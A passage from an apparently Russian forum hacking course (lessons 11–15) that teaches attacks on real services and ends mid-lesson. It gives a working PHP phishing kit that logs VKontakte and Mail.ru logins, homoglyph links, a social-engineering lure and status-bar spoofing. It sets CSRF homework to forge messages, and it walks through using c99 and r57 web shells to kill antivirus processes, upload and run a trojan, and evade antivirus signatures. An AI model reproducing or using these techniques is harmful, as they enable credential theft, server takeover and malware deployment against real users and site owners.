Можете мне поднять рейтинг если хотите))) перейдя вот по этой ссылке http://xakep9009.narod.ru/test/index.html ....
(за одно хоть проверю не блокирует ли более чем 2 записи xakep.ru....) я просто проверял с двумя файлами 1.html и 2.html .....ну тогда прокатило удачно))) мне добавили 4 балла)))

Вывод
1)Мы с вами познакомились с такой мега уязвимостью как XSRF
2)Повторили html
3)Узнали как можно прятать загружаемые странички....через тэг ifrаmе
4)На практике рассмотрели к чему может привести XSRF в действии.
5)Теперь будем баловаться с рейтингом
_____________________________________________________________________________________________________

Ну собственно всё на сегодня))))
Надеюсь ,что вы узнали для себя что то новое.....
и буду очень рад если вы выполните еще одно домашнее задание....

Попробуйте на том же fa-kit.ru написать XSRF для отправки писма.....(от чужого имени)

И еще одно задание потяжелее......
Это найти способ собирать эти ссылки(Оценить сообщение) от опредилённого пользователя....(не в ручную)
и Попробовать написать XSRF для автоматического создания темы на forum.xakep.ru .

Свернутый текст

Урок 12.

С чего начать свой путь.

Я уверен ,что многие из вас станут хакерами по круче меня раза в 3 ...или в 4...
И уверенность моя заключается в том , что у большинства из вас есть то ,что нету у меня...
1)Усидчивость
2)Правильно спланированное время(время)
3)Мозги //=) их у меня не так уж много =)
_________________________________________________________________________________________________________________________

Когда я начинал изучать взлом....и всё что с ним связанно мне было 12-13 лет =)
Я уже тогда чисто интуитивно понял , что без знания  языка программирования ничего не получится.....
И первым делом я начал изучать Паскаль.
Это была моя первая тотальная ошибка.

Многие твердят ,что его надо изучать для того чтобы понять синтаксис других языков программирования.....итп.
Могу вам сказать...ничего толкового я из этого языка не взял....единственное что я сделал на этом языке это autorun
(авторан)
При запихивании дискетки в компьютер....она включала пищалку....(как при переполнении буфера).

Так что взяли на заметку.....такие языки как Basic , Pascal (Турбо Паскаль) не нужны для взлома......
Не тратьте на них своё время....эти языки мёртвые .....единственная причина по которой вы можете их изучить...
это любопытство.

И первой моей ступенькой к познанию взлома стал мега прорыв.....
Познание поисковика Google.com

После чего я начал записывать всё что я находил в интернете про взлом ...в тетрадь....дабы не забыть.....
У меня эта тетрадь до сих пор лежит.....там очень много интересного что я тогда выписывал...и каждый год я датировал....
и писал когда вносил последние добавления.....(сейчас она у меня как реликвия лежит) =-)

После поисковика я начал читать журнал Хакер.(на данный момент у меня почти все журналы Хакера...кроме самых
первых....но их я прочитал в электронном виде)

Но читая всю эту "муть" я понимал что ничего не понимаю...что за shell что за BIOS что за реверс....что за
бэкап....ну итд.
Тогда я понял....а почему бы мне не составить словарь Хакера...(собственный)и завёл себе ещё одну тетрадь куда
я записывал не известные слова......и после того как входил в интернет искал их и записывал.....
до сих пор помню что первым словом в словаре было IP

Набрав достаточный словарный запас я начал изучать Windows ...
И делал я это опять же в Google набирав запросы на подобии "Скрытые возможности Windows"
После чего я очень сильно продвинулся ибо теперь понимал как можно использовать Crack`и и по какому принцыпу они
работают.....

После того как стал продвинутым пользователем Windows (начал понимать работу Windows и исправлять её недочёты) я понял ,
что хочется мне чего то по взламывать....

И начал активно капать старые диски Хакера (а именно Видео взом)
На этом этапе я тупо смотрел ....и не понимал что они делают.....попусту тратил время...(и это мой большой минус ибо
тогда я не знал....что же они такое делают...и что нужно знать , чтобы самому осознанно такое проделвыать....)
Набравшись опыта могу вам выстроить лестницу по которой вы должны будите пройти ...чтобы стать Хакерами.....и она
будет выглядеть так.....

1)Поисковик Google
2)Углублённое знание html
3)На третем пункте мнения могут разайтись....но я скажу что PHP
4)SQL запросы
5)jаvаsсript
6)Perl
7)UNIX
//вообще Юникс по возможности надо изучать параллельно со всеми остальными пунктами...ибо сейчас почти все сервера
держатся на нём.
8)Python
9)ASP/ASPX

Это всё то , что необходимо знать любому Хакеру....если даже не всё.....то железно нужно знать первые 5 пунктов...
и именно в такой хронологии...

Моей главной ошибкой в начале изучения была .....не компитентность в структуре сайта.....(я не знал как работает сайт...
.что это такое , а уже просматривал видео по взлому) так вот если вы хотите подойти ко взлому серьёздно...
то первым делом вам надо изучить структуру сайта....и понять ,что сайт это простые файлы....
которые лежат на другом компьютере....а вы этот файл просматриваете через специальную программу.......

После того как вы поймёте , что такое сайт....как он устроен.....
получите хотябы начальные знания по php и jаvаsсript вы сможете смело переходить к следующему этапу.....
это непосредственное изучение методов взлома.....
Что собственно я вам продемонстрировал...в моих урока....
То что я написал вам поможет.....но для того ,чтобы применять что то осознанно....
и ломать не то что можешь...а то что хочешь....нужно делать всё осознанно.....а для этого нужно знать язык(и)
программирования =D

Тут конечно я для вас сразу же становлюсь снобом.....
но это так.....на начальном этапе я всех людей говорящих мне ,что без знания языка(ов) ты ничего не сможешь ,
просто посылал в топку =)))и зря это делал....думаю сейчас бы я добился большего...чем имею.....(знания)

Ну а после того как я уже наконец то изучил SQL и PHP я начал читать разные статьи с
antichat.ru и параллельно смотреть видео по взлому video.antichat.ru //На тот момент это был самй актуальный сайт....
на эту тематику....
А сейчас уже много аналогов появилось ( http://www.inattack.ru/group_article/45.html )
....и по разным мнениям кто то их считает лучше ...кто то хуже.....
Лично я учился вот как
antichat + google + Журнал Хакер + Книги купленные по тематике.....
Кстати относительно старую мою библиотеку вы можете посмотреть по фотке =)
http://rs.foto.radikal.ru/0709/79/936013da7298.jpg
Не помню когда это было....нашёл в поисковике.....

Из книг которые мне помогли могу отметить .....
1)WEB-сервер глазами Хакера
2)Исскуство Эксплойта Джон Эриксон

Всё остальное что я читал было либо фуфло...либо не относилось ко взлому.....
Могу привести пример первосортного фуфла....эта книга "Хакинг и Антихакинг" такой фиговой книги даже в свои 15
лет я нигде тогда не видел Х-) кому интересно можете посмотреть .
info/2007/04/21/bystro_i_legko_khaking_i_antikhaking_zashhita_i_napadenie.html

Ну и естественно вам надо знать ссылки...на самые свежие найденые уязвимости
www.securitylab.ru
http://www.cyberinfo.ru/2/index.htm
Ну и такой наиизвеснейший ресурс среди хакеров это
http://milw0rm.com/
Там есть самые свежие Эксплойты....крякер MD5 (онлайн)....и еще куча куча всего....вообщем сами зайдёте посмотрите.....
НО есть одно НО...если вы не знаете английского.....не сладко вам прийдётся....поэтому прибавляйте ко всем пунктам
которые я написал десятый.... 10)Знание Английского
Эксплой - http://ru.wikipedia.org/wiki/Эксплойт
Да и вообще большинство документации от разных хакерских программ и Эксплойтов идут на английском языке...

Вывод

1)Мы сняли вопрос "С чего начать?" раз и навсегда....
2)Я поделился своим опытом...и надеюсь вы не повторите мои ошибки в дальнейшем....(изучение ненужных языков,
параллельное изучение одинаковых по синтаксису языков итд.)
3)Вы теперь имеете полное представление о том как надо продивигатсья ....
4)Узнали что такое Эксплойт =) и где его искать.....
//от себя хочу добавить Эксплойт это что то на подобии руководства к действию(для взлома)...ибо авторы написанного
эксплойта делают комментарии и изучив их вы сможете легко ориентироваться в написанном коде.....

Свернутый текст

Урок 13.

Создаём собственный фейк!

Фейк произошло от Английского слова fake — подделка.

В нашем случае мы будем подделывать странички авторизации , для того чтобы заполучить заветный логин:пароль от любого
сайта.
Я встречал много тем....там где продают фейки....а люди даже их покупают..... запомните всё самое лучшее можете
сделать вы сами....и делаете это вы бесплатно!ну и перед тем как начать....хочу сказать ,что создание фейков это
очень лёгкое дело....
Моё главное требование к этому уроку это знание html.
Не смотря на то ,что я буду использовать php(файлик)...знание его вам в этом уроке вообще не понадобится!

Создаём фейк Vkontakte

1)Первым делом зайдём на страничку Vkontakte.ru
//И если вы зашли под своей учётной записью выйдите из неё.
Перед вами должна открыться страничка "Добро пожаловать" её мы и будем потделывать.
2)Создаём папку на рабочем столе под названием sait
После чего сохраняем страничку vkontakte.ru (добро пожаловать)вот таким способом....в

-Firefox (Файл---Сохранить как...---(далее переходим в ту папку куда сохранять "sait")---(Выбираем тип страницы
"Веб-страница полностью" ,a имя файла даёте index.html)
-Opera(Файл---Сохранить как---(переходим в папку sait)---(Выбираем тип файла "HTML файл с изображениями" имя файла
index.html)
-Internet Explorer(Файл---Сохранить как---(Выбираем тип фалйа "Веб-страница полностью" имя файла index.html)
_________________________________________________________________________________________________________
Но не делайте пожалуйста очень популярной ошибки.....такой как index.html.html , index.html.mnt //двойное расширение.
Для того чтобы её избежать этой ошибки поставьте у себя в настройках:
Панель управления---Свойство папки---(вкладка) вид---(и снять галку с поля)"Скрывать расширения для зарегистрированных
типов файлов"--ОК
И теперь у ваших файлов всегда будет отображаться расширение!
__________________________________________________________________________________________________________

И так мы сохранили страничку полностью!
Теперь если мы откроем наш index.html мы увидим ,что у нас полностью идентичная страничка!(Для этого мы и
сохраняли не только html но и сами картинки).

3)Теперь нам надо подредактировать код этой странички так, чтобы когда пользователь ввёл логин и пароль...
.на нашей страничке все пароли сохранились у нас на сервере.....
для этого нам понадобится один php файлик с таким содержанием.
_________________________________________________________________________
<?
$Login = $_POST['login']; // Логин...
$Pass = $_POST['passwd']; // Пароль...
$log = fopen("base.php","a+"); //открываем файл хранилища...
fwrite($log,"<br> $Login:$Pass \n"); //записываем всё в хранишище...
fclose($log); //закрываем хранилище
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru'></head></html>"; // перенаправляем
пользвателя на любую //ссылку в данном случае http://vkontakte.ru
?>
_________________________________________________________________________

Сохраняем этот файлик под названием log.php
И создаём файлик base.php //с пустым содержанием.
Да, и всё это мы сохраняем в папку sait там где у нас лежит наш будущий фейк.

4)Теперь перейдём непосредственно к редактированию index.html
Открываем его в любом редакторе (блокноте или NotePad++) //Очень рекомендую всем кто занимается кодингом
использовать NotePad++ удобно.

И всё ,что нам нужно для создания собственного фейка это
4.1)Найти Форму для регистрации<form ....
4.2)Присвоить ей значение action="log.php" тоесть получится <form action="log.php" ....>
4.3)И в поле name присвоить login или passwd(name="login" ,name="passwd")

Не пугайтесь сейчас всё поясню на примере....
А пока знайте ....что значения в поле name (login , passwd) присваиваются именно такие ,потому как я им
присвоил значение в моём мини php скрипте....(я их выделили жирным цветом)
А при помощи action="log.php" мы форме говорим "ДЕЛАЙ ТО ,ЧТО НАПИСАНО В ЭТОМ СКРИПТЕ!".

И так поехали....

1)Ищем форму которая занимается авторизацией!
Делаем мы это так....
Открываем наш index.html при помощи блокнота....
жмём: Правка---Найти---(ищем вот что...) <form
И первое ,что нам выдаётся это вот эта строчка...

<form method="post" name="login" id="login" action="login.php">

Это то что нам нужно! мы по интуиции догадались....что наверное action="login.php" выполняет скрипт для
входа в систему....=) тут и ёж поймёт...
Теперь нам надо ,чтобы вместо ихнего скрипта выполнялся наш....значит пишем так....

<form method="post" name="login" id="login" action="log.php">

Далее нам уже надо искать <input в который идёт информация о Логине....Вконтакте это поле называют Email.
Пробуем искать.....и находим вот такую строчку....

<input class="inputText" onclick="show('expirePad');" name="email" id="email" size="20" type="text">

Меняем ,как я уже говорил на наше значение.....name="login" и у нас плучается

<input class="inputText" onclick="show('expirePad');" name="login" id="email" size="20" type="text">

Точно так же ....глазками ищем что то похожое на password или pass и мы находим

<input class="inputText" onclick="show('expirePad');" name="pass" id="pass" size="20" type="password">

Заменяем на наше значение....

<input class="inputText" onclick="show('expirePad');" name="passwd" id="pass" size="20" type="password">

Вот и всё....наш фейк готов! =)))
А вы думали ,что это тяжело....или вообще не думали

Теперь нам надо его опробовать....
Я вам говорил ,что для наших нужд понадобится....сервер.....можете проверить всё на вашем компьютере
(локальном серевере)//PHP+Apach+MySQL см прошлые уроки.

Либо сделать как я =)))выложить своё творение на бесплатный хостинг banned =)))

Я зарегал себе там бесплатный акаутн.....так как там есть всё ,что нам нужно php+FTP
Если хотите посмотреть на мой фейк...то он расположен тут http://vkontaktee.banned

При выборе моего пути надеюсь трудностей не возникло....(регистрация)
После того как вы зарегистрировались.....вы можете выкладывать свой сайт....
Делается это чень просто.....открываем "Мой компьютер" и в том месте где написанно "Мой компьютер"
(адресная строка) прописываем ftp.banned
Далее в появившимся окошке вводим
Логин и Пароль....вашей учётной записи....вот такого вида...
vkontaktee.banned : qwertypass
После чего у вы подключитесь к серверу.....и это у вас будет выглядеть...как будто вы находитесь в
папке ...в которой ничего нету....
Так вот это называется корневая директория .....переносим туда все наши файлы....
1)index.html
2)полностью папку(с изображениями которая была создана вместе с index.html иначе у нас не будет никаких
картинок и логотипов.)
3)base.php
4)log.php

Теперь ваш фейк полностью готов к применению.

Проверяем его работоспособность.....
Заходим на свою страничку.....допустим vkontaktee.banned
И проходим авторизацию......(как мы это делаем обычно)
после чего......переходим по ссылке vkontaktee.banned/base.php

И видим ,что у нас записался логин и пароль......в файлик base.php
Всё.

Давайте для закрепления матерьяла рассмотрим еще один пример с mail.ru

Создаём собственный фейк для mail.ru

Поехали по схеме....
1)сохраняем нашу страничку со всеми картинками и всяким бредом.....и называем её index.html
2)Открываем и начинаем редактировать....
ищем форму для авторизации <form (там где action= хоть как то похож на автризацию......)
вот что мы нашли....

<form name="Auth" method="post" action="http://win.mail.ru/cgi-bin/auth"> //очень похожо на авторизацию
не правда ли ?

Заменяем на

<form name="Auth" method="post" action="log.php">

продолжаем идти по схеме...и ищем <input  связанный хоть как то с login и password

и мы находим эти поля

<input type="text" class="long" size="10" name="Login" tabindex="1" value="" />

<input type="password" class="long" size="15" name="Password" tabindex="3" value="" />

Меняем их на наши значения....login и passwd  // хочу сразу заметить ,что регистр очень важен....Login и login
разные вещи!

<input type="text" class="long" size="10" name="login" tabindex="1" value="" />

<input type="password" class="long" size="15" name="passwd" tabindex="3" value="" />

вот и всё....фейк готов....

Те кто знают html могут сделать этот фейк из любительского....в профессиональный....(тоесть при переходе по ссылкам
в этих страничках....ты всёравно выходишь на фэйковский ресурс....)

Тот же Вконтакте ....мне было просто лень делать тоже самое но только в том случае если жертва нажмёт не на вход
,а на ,допустим Регистрацию или допустим на смену языка........короче это всё делается по токому же принцыпу.....
и надеюсь хоть чуть чуть он вам стал понятен....
"Надо учить формы }=) "

----------------------------------------------------------------------------------
Но....вы наверное возмутитесь.....если я вам скажу ,что все сворованные пароли может посмотреть любой проходимец....
да это факт....как с этим бороться.....учить php... и моё к вам задание сделайте так...,чтобы файлик base.php не мог
просматриваться посторонними лицами...НО! при этом ,чтобы он оставался работоспособным!
это я вам на всякий случай сказал...чтобы небыло тут баталий....а я могу твои данный стянуть, учитесь защите.
----------------------------------------------------------------------------------

если кому то всё еще не понятно как делаются фейки.....я для вас выложил свои 4 фейка....в качестве примера......
vkontakte.ru
forum.xakep.ru
Gmail.com
mail.ru
сюда http://vkontaktee.banned/fakes_By_Xakep9009.rar

Несколько способов впарить фейк

Ну и теперь парочку примеров из практики....
1)
чаще всего я свои фейки прячу в ссылки на форумах....или в почте......в ICQ к сожалению такой фишки как
Тоесть я прячу нашу ссылку вот так..... пишу httр://vkоntаktе.ru только малая хитрость заключается в том ,что
в место p - английской...я написал букву р -русскую .....в место о - английской  о -русскую.....
ну вы поняли логику.....таким образом у нас из [link=http://vk%D0%BEntakte.ru]http://vkоntakte.ru[/link]
получился обычный текст ....а не ссылка....а во всех форумах и почтовых серверах(или почти во всех) есть
функция вставлять ссылку в слова.....
типо скачивать >>>>>сюда<<<<<

Это был первый способ....

Второй мне больше по душе =)))на него ловятся 99,9% людей.....

Хакеры это хорошие психологи....и любой хакер должен знать не только слабость ресурса(сайта) но и его хозяйна.....
И поэтому заявления ,что СИ (соц инженерия) это не по хакрески это полная глупость
почитайте кстати про
[link=http://ru.wikipedia.org/wiki/%D0%A1%D0%BE%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%B0%D1%8F_%D0%B8%D0%BD%D0%B6%D0%B5%D0%BD%D0%B5%D1%80%D0%B8%D1%8F]Социальную Инженерию[/link]
Меня уже несколько раз просили написать про СИ....вот один из моих любимых примеров внедрения фейка при помощи СИ....

Я говорю / пишу жертве , что нашёл обалочку...через которую можно подключиться к сайту вконтакте.....
и качать от тудо музыку , кино, просматривать скрытую информацию. (этот способ использую тогда ,
когда скрыть ссылку почти невозможно) но он эффективен как я уже говорил на 99,9% =D ибо алчность
людей до безумства сводит......
Кстати хакеров тоже....так что не будьте алчными....

Еще один способ это подмена URL (адресной строки) в строке состояния.....тобишь то,что вы видите
наведя курсором на ссылку.
Но его можно использовать только если жертва сидит под IE (что бывает в большинстве случев)

и так пишем html код

<a href="http://vkontaktee.banned/"
onMouseOver="window.status = 'http://vkontakte.ru';
return true;"
onMouseOut="window.status='';">http://vkontakte.com</a>

Теперь при наведении на ссылку у нас в левом нижнем углу будет высвечиваться vkontakte.ru а не мой фейк_)

Каждый из вас может придумать свой способ....и пользоваться им!=) и он будет успешным))Так что не
расчитывайте на других...учитесь думать сами.....я вот учусь =-) хоть и безуспешно ^^

Вывод

1)Мы сегодня познакомились с вами еще с одним видом атаки на WEB сайты.
2)Повторили что такое ftp .
3)Рассмотрели несколько способов "впаривания фейков".
4)Поняли ,что фейк может создать любой....лижбы было желание.
5)Поставили точку в обсуждении о нужности СИ (соц. инженерии). НУЖНА.
6)Повторили html =)
7)Ну и самое главное научились делать фейк!и нам теперь ненадо постить "люди создайте фейк от
forum.sex.ru" =)

0

10

http://newhackers.mybb.ru/img/avatars/000a/71/82/2-1250716879.gif

Урок 14.

Фишки от Xakep9009

Свернутый текст

HTTP это HyperText Transfer Protocol — протокол передачи гипертекста.
Более подробно смотрите тут http://ru.wikipedia.org/wiki/HTTP

Sniffer - от английского слова нюхать. - Сетевой анализ трафика (не пугайтесь , звучит угрожающе...на самом деле
ерунда , на примере всё поймёте.)
Более подробно смотрите тут http://ru.wikipedia.org/wiki/Sniffer

Для того чтобы просматривать весь проходящий трафик...нам нужно будет скачать такую программу как
EffeTechHTTPSniffer

Она понадобится для того ,чтобы на более низком уровне просматривать весть проходящий трафик по HTTP
протоколу....
Эту программу вы можете найти тут.
http://narod.ru/disk/3930462000/EffeTec … r.rar.html

После того как вы её установили....мы перейдём к фишкам....которых я 4 недели назад искал и ничего об этом не нашёл....

Обманываем обманщиков.

Под обманщиками я понимаю такие сайты как vkontakte.ru и weborama.ru
Почему они обманщики?....а потому что выкладывать музыку можно....а скачать нельзя....что за бред?

Ну так давайте обманим тех кто обманывает нас....и научимся скачивать музыку с любого сайта....(где она есть
естественно =) )

Качаем музыку с Vkontakte.ru

//Хочу сразу сказать...что все эти манипуляции я проделывал в Firefox ....с установленным Flash плеером...
поэтому если у тебя не установлен //флеш плеер...установи...
ВАЖНО не жмите проигрывание песни до Сниффера
1)Находим нужную нам песню....(в контакте)
2)Не нажимая на проигрывание песни переходим к нашему Снифферу...
3)Жмём Start и наш сниффер начинает работу.
4)Нажимаем на проигрывание песни....ждём пока вы не увидите ,что сниффер перестал ловить пакеты от контакта.
5)Выключаем сниффер (Stop Sniffer)
6)И теперь нам надо из полученных пакетов определить где же наша песня...

А сделать это легко....я просил вас в самом начале не жать проигрывание этой песни...до запуска сниффера...
ибо нам важен момент подключения к этой песне....(перехват момента подключения) и этот момент и будет содержать в
себе прямую ссылку на этот файл!

Тоесть если вы всё правильно сделали....то у вас в логе сниффера должна была появится примерно такая строчка....
http://cs1334.vkontakte.ru/u5970851/aud … 89b197.mp3

Это и будет прямая ссылка на файл)))

Тоесть в вашем сниффере должна появиться строка с такими значениями
Server(IP:Port) = http://cs1334.vkontakte.ru
URL = /u5970851/audio/f222da89b197.mp3
Это и есть прямая ссылка....на файл....только в разбитом виде....(чтобы получить её полностью вы можете нажать в
сниффере на это поле два раза потом перейти во вкладку Content и вот она ваша ссылка полностью)!

7)После того как вы получили ссыку такого вида....
[link=http://cs1334.vkontakte.ru/u5970851/audio/f222da89b197.mp3%C2%A0]
http://cs1334.vkontakte.ru/u5970851/aud … 89b197.mp3 [/link] переходим по ней....далее
Файл --- Сохранить как --- Тип (все файлы) \ имя (на своё усмотрение).mp3---сохранить.

___________________________________________________________________________
для закрепления...

Качаем видео с Vkontakte.ru

Надеюсь вы поняли ,что на одной музыке мы не остановимся!!!и никаких сервисов для скачивания видео с контакта
нам не нужно мы Хакеры мы свободные люди!(пока ^^)
Так вот...поехали...
1)Открываем страничку с видео....(НО НЕ ПРОСМАТРИВАЕМ)
2)Включаем Наш сниффер!
3)Ждём пакетов от контакта....
4)Получаем пакет с подключением....вот такого типа...
http://195.218.181.192/assets/videos/8c … 271.vk.flv
и он же является прямой ссылкой на скачку этого файла....
5)Качаем.//Надеюсь объяснять про flv файлы ненадо....=)
________________________________________________________________

Теперь что же делать если вы всётаки нажали на просмотр\прослушку раньше чем вы включили наш сниффер!
Вам надо удалить все личные данные....(которые браузер сохраняет автоматически.)Делается это в Свойствах или
Настройках//в разных браузерах по разному

Теперь проделаем тоже самое с weborama.ru

1)Выбираем песню которую хотим прслушать(но не прослушиваем)
2)Запускаем Сниффер
3)Ждём буквально секунд 10
4)и на Вебораме сделали....поумнее....они спрятали .mp3  в ссылку такого вида
http://static1.weborama.ru/audio/f2/f2b … 2edc7693e5

Как увидили....
Server: http://static1.weborama.ru URL: /audio/f2/f2b5e251369c5ee01931522edc7693e5
Без сомнений копируйте ссылку....и вставляйте в браузер....
После чего подождите пока он обработает запрос....и выдаст вам файл....который вы сможете сохранить как mp3
----------------------------------------------

Это я вам привёл всего несколько возможностей HTTP Sniff`ера....

А те кто удосужились выучить html могут гораздо больше!)

Так же HTTP сниффер используют для нахождения уязвимостей таких как SQL уязвимостей так....и всех о которых я уже
писал....так как в адресной строке передаются параметры...которые обычно спрятанны...а при детальном анализе мы
сможем применить эту информацию для взлома....
Так же Сниффер можно использовать против пинча....(запустить сниффер , а затем пинч тем самым перехватить Логин и
пароль от почты, от сайта.....короче куда отчёты он шлёт)

Так что возьмите себе на заметку такую мощную вещь!

Вывод
1)Узнали что такое HTTP sniffer
2)Мы узнали ,что мы не все процессы видим...которые выполняет наш браузер!
3)Поняли ,что он нам очень поможет в нахождении и реализации уязвимостей.
4)Научились обманывать обманщиков....

Свернутый текст

Урок 15.

Shell

Shell code - (Шелл код)это код который может управлять(отдавать команды) удалённой машиной (компьютером) через
командную строку.

Ох как много накрученных слов....но это на первый взгляд....на самом деле всё гораздо проще.....как только вы
увидите что это такое.....

Я достал свой маленький архив Шеллов.... для того , чтобы вы посмотрели на практике что это такое....
Скачать можно тут : http://narod.ru/disk/4715943000/shells (copy%203).rar.html

В этом архиве находится 5 разных шеллов , но функции у них почти одни и те же....просто кому какой удобнее)))
Функционал у всех шеллов тоже особо не отличается....но в некоторых больше функций в некоторых меньше....

Перейдём к практике.
Если вы читали мои предыдущие уроки , то у вас уже должен быть установлен ваш локальный сервер....тоесть "localhost",
он нам понадобится для того чтобы экспериментировать....

1) Разархивируйте архив с шеллами и у вас появится папка "shells" перенесите папку на ваш локальный сервер...
чтобы путь к папке shells был такой.... localhost/shells
(Вообще это не обязательно...но мы это делаем для того чтобы в дальнейшем вы не растерялись)

2)Теперь давайте откроем Браузер и введём туда localhost/shells/c99madshell.php
И перед вами появится шелл! теперь давайте рассмотрим его по подробнее

Вот так выглядит "Головная" часть шелла....которая показывает всю информацию о Сервере(где расположен шелл).

----------------------------------------------------------------------------
Software: Apache/2.0.59 (Win32)
[link=http://localhost/shells/c99madshell.php#]http://localhost/shells/c99madshell.php#[/link]PHP/5.1.6
//Версия Apache и PHP
uname -a: Windows NT XAKEP9009 5.1 build 2600 // Имя компьютера и Операционная система.
Хакер9009 //Имя пользователя
Safe-mode: OFF (not secure)   //Это настройки сервера (включён ли безопасный режим или нет)
T:\home\localhost\shells\  drwxrwxrwx // Дерриктория где расположен шелл ( полный путь)
Free 22.56 GB of 93.16 GB (24.22%) //Свободное место на Сервере(на кмпе жосткий диск)
Detected drives: [ a ] [ c ][ d ][ e ][ t ] //Локальные(жосткие диски) и не локальные(флешки) диски.
Как вы заметили если на них нажать , то вы можете передвигаться по этим деррикториям\дискам.... скажем диска "C:\\"
----------------------------------------------------------------------------

Как видите ничего сложного....поехали дальше...(а если сложности возникли...то просто попробуйте на практике и я
уверен вы всё поймёте!)

3) Listing folder (7 files and 1 folders): //Какие файлы и папки расположены в текущей директории.....
//(почему в текущей? потому как вы можете передвигаться по директориям)

Ниже идут столбцы:
Name - Имя файла или папки. ( Запомните ".." двоеточие означает переход на каталог выше.
Пример: Были "C:\\Programm files" Пишем: "С:\\Programm files\.." оказываемся "С:\\" .А одна точка означает
текущий каталог.
Size - Размер или тип(папка - DIR или ссылка - LINK).
Modify - Когда последний раз модифицировали этот файл или папку. (или создали этот файл \ папку ).
Perms - Права на запись(w) или чтение(r). Bсё вместе(и запись и чтение будет rw).
Action - Действия  и здесь есть три пункта
  I - information (информация о файлах и папках)
  E - Edit ( редактировать файлы и папки)
  D - Download (Скачивание файлов)

Чуть ниже расположено поле
Select All - выделить всё (для того чтобы проделать какие то действия)
UnSelect All - снять выделении.
With Selected - это поле означает какие действия будем проделывать с файлами которые выделены....
Там есть несколько вариантов....
Delete - удалить
Сut - вырезать
Copy - копировать
Change-mode - изменить права на запись и чтение.

Так же если вы будете копировать - вырезать....у вас появится кнопка Paset - вставить....(переходите в
любую директорию ...жмёте Paste и тот файл который вы копировали\вырезали...вставиться именно в ту директорию....

4) Сommand Execute
Выполнение команд....

Эта часть Шелла работает полностью с командной строкой....
И тут то мы вспоминаем всемирный вопрос....зачем нам знать Unix для взлома серверов?

А вот зачем....
Попробуйте набрать в поле Enter:

ls

Что вы увидите в поле...
Result of execution this command: // Результат от выполненной команды...

А вот именно! ничего....

А попробуйте набрать вот эту команду:

DIR

Вы увидите что то вроде этого

-----------------------------------------------------
Содержимое папки T:\home\localhost\shells

31.12.2008  14:47    <DIR>          .
31.12.2008  14:47    <DIR>          ..
24.12.2008  21:47            44 283 c99madshell.php
31.12.2008  14:48    <DIR>          clon
25.03.2004  00:55             4 884 KA_uShell.php
04.03.2004  17:05            15 431 r57shell.php
23.10.2003  03:22            91 159 remview.php
18.10.2003  21:15            15 965 result.php
10.12.2003  21:49           208 538 shell.php
31.08.2008  20:55            12 461 wxshell.php
               7 файлов        392 721 байт
               3 папок  24 223 674 368 байт свободно
-----------------------------------------------------

А это две одинаковые команды...только одна исполняется в Unix системах .... а другая в Windows....

Теперь представьте у вас есть доступ к командной строке где стоит Fedora 9 .... а вы не знаете ни одной команды....
вот досада то....=) соответственно ничего вы сделать с этим "даром" не сможете....

Поэтому не пренебрегайте и самое главное не бойтесь командной строки...она вам не раз поможет!

Поехали дальше....

Поле Make DIR  означает создание папки Пример: T:\home\localhost\shells\lol  //Создастся папка с именем "lol"
Make file означает создание фала. T:\home\localhost\shells\help.php //Создастся файл (php)
Search искать файл. // Честно говоря плохо работает =-)
Upload загрузить файл на сервер. (в текущую директорию)
GoDIR Прописываем директорию в которую мы хотим пройти....
Go File (Открыть\Скачать файл)
Select Показывает открытые порты у сервака....

//Так же посмотрите SQL и Tools Первое для подключения к Базе данных на сервере...а второе это открытие портов....

Основной функционал мы рассмотрели.....

Теперь давайте рассмотрим для чего нам этот шелл нужен.....

Ситуация...мы получили доступ к админке на любом форуме\сайте...неважно....главное , что мы можем залить Shell
Залили его...и теперь (в зависимости от расставленных прав) мы получаем полноценный доступ к серверу!

Почему я выделил слово Сервер....потому , что на сервере как правило расположен не один сайт.....
А значит...сломав один сайт мы получаем доступ ко всем сайтам расположенных на этом сервере....
Посмотреть Какие сайты расположены на сервере можно тут http://madnet.name/tools/madss/

Теперь имея шелл мы можем пройтись по директориям и отредактировать index (главная страница)
Так же мы можем протроянить этот сервак убив несколько процессов(допустим антивирусы)
Первым делом узнаём процессы(выполняемые на серваке) tasklist почему то у меня в c99madshell.php не сработал....
просто вылетел)))
но зато сработал в r57shell.php
(еще одна разновидность шелла хочу заметить...этот шелл старичок и его вы должны знать как никакой другой...
хотя бы ради приличия, так что ознакомьтесь с ним...)

После чего зная PID (номер процесса) мы можем завершить его ...набрав команду
taskkill /PID 4444 /T   где 4444 это номер процесса который мы хотим завершить.... "/T" мы пишем для того...
чтобы завершить ВСЕ дочерние процессы связанные с этим.

Следующий этап будет залитие трояна на сервер и запуск..делается это очень легко....
В Upload выбираем программу (троян) который мы хотим запустить.....
Качаем её на сервер....

После чего выполняем такую команду....
Start troian.exe  где troian.exe это залитый вами троян....

_______________________________________________

Вот и всё сервер мы протроянили....

Еще один из моих любимых Shell кодов является remview.php

Легче этого шелаа я вообще не видел....
Если вы нажмёте на картинку "Молоточек с папкой" , а по другому и не скажешь....
То вы зайдёте в ту часть...где можно отдавать команды....

Shell commands Аналог Сommand Execute // это там где отдаются команды командной строке.

Не пугайтесь увидев это :
#example (remove comments '#'):

#cat /etc/passwd;

#ps -ax

#uname -a

Это просто приведены примеры....

Так же тут есть функция кодирования в разные кодировки....
Universal convert

Вообщем все остальные шеллы очень похожи....если не внешне ....то названиями полей и теперь вы сможете самостоятельно
определить к чему какое поле относится...
____________________________________________________________________________________

Но как вы заметили (если у вас стоят антивирусы) то вы даже не сможете залить shell... так как он распознаётся как
троян....
и сразу блокируется.....

поэтому давайте поговорим о криптографии...

Сам себе криптор.

Я хочу рассказать вам о основах криптографии....

Опять же...ничего сложного здесь нет...мне казалось криптуют только самые крутые хакеры....познав Perl я понял ,
что это не так =)
Криптовать может каждый....и я вам это докажу...правда сделаю огаворку...разговор будет весить больше про WEB ,
чем про программы.

Для того , чтобы понять как криптовать...нам нужно понять как работают антивирусы.
Антивирусы работают по принципу сравнения сигнатур.
Пример: В базе данных антивируса хранится код который является вредоносной программой.(по его мнению)
допустим это будет php код....

<?
echo("I am troi!");
?>

Тогда нам надо обмануть антивирус....и заменить этот код на его синоним...

<?
print("I am troi!");
?>

Это один из способов....(замена на синоним)
Но....для того , чтобы заменять на синоним....нам нужно определить какой именно кусок кода является вирусом\трояном
(по мнению антивируса)

И я это делаю так....

Берём
r57shell.php и разбиваем на несколько кусочков....а именно...

от <? до сюда ?>.
Тоесть разбиваем на части....
Пример:У нас есть файл с содержимым
---------------------------------------
